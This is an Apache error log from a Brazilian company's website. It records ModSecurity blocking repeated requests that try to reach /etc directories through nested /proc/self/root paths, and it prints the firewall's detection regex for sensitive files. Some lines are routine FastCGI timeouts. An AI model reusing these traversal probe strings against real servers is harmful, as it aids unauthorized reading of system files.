[Wed Mar 18 15:54:07.131278 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:51992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0z-w_le52K8_3pV0SogAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:54:09.125775 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48016] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:54:12.183330 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:53906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr00wbLMZ6AikZjR9X2tQAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:54:19.064687 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:51750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr02wkwaGbbGflqUZBJ1QAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:54:27.236198 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:43428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr04wbLMZ6AikZjR9X2wwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:54:30.133832 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48622] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:54:44.691052 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.241.31:50536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr09EzinOy1jxa1j4dUQAAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:54:52.121796 2026] [proxy_fcgi:error] [pid 29882:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:54:59.559037 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:39268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr1A-oXxyEfFpUF8f-svQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:55:16.061793 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50038] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:55:39.385826 2026] [proxy_fcgi:error] [pid 29882:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50702] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:55:44.270687 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:33806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr1MCmAPhZkrhU8w4mhHwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:56:04.105754 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51412] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:56:21.531705 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.241.31:52946] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr1VSmAPhZkrhU8w4mhQAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:56:28.117759 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52102] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:56:43.211569 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:35310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr1a8df6f5d65gmYZQM0QAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:56:53.353049 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52820] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:57:18.106175 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53464] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:57:47.121791 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54232] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:58:20.081977 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55200] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:58:43.389101 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:44574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr148df6f5d65gmYZQNOgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 15:58:44.052388 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55930] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:59:08.126151 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56674] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:59:12.904605 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:56920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr1_-yqAr6etmhZHNoAvQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 15:59:30.133971 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57294] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:59:52.145781 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:00:14.125809 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58694] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:00:24.811475 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:50496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr2SOw_le52K8_3pV0TRAAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:00:30.722594 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:58524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr2TgkwaGbbGflqUZBKlAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:00:33.771546 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.241.31:58526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr2USmAPhZkrhU8w4mhtAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:00:35.133899 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59326] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:00:58.125869 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60048] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:01:22.113875 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60782] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:01:45.131349 2026] [proxy_fcgi:error] [pid 23798:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33274] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:02:06.723688 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:47330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr2ruoXxyEfFpUF8f-t1wAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:02:07.133788 2026] [proxy_fcgi:error] [pid 15051:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33942] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:02:14.100730 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:55972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr2tgbLMZ6AikZjR9X3oQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:02:32.133885 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34680] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:02:43.527050 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:55980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr20-oXxyEfFpUF8f-t9QAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:02:55.137867 2026] [proxy_fcgi:error] [pid 11816:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35368] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:02:59.644480 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:53186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr24-oXxyEfFpUF8f-uEwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:03:19.157935 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36002] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:03:45.126634 2026] [proxy_fcgi:error] [pid 11816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36736] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:04:13.017815 2026] [proxy_fcgi:error] [pid 23798:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37514] AH01075: Error dispatching request to : (polling)
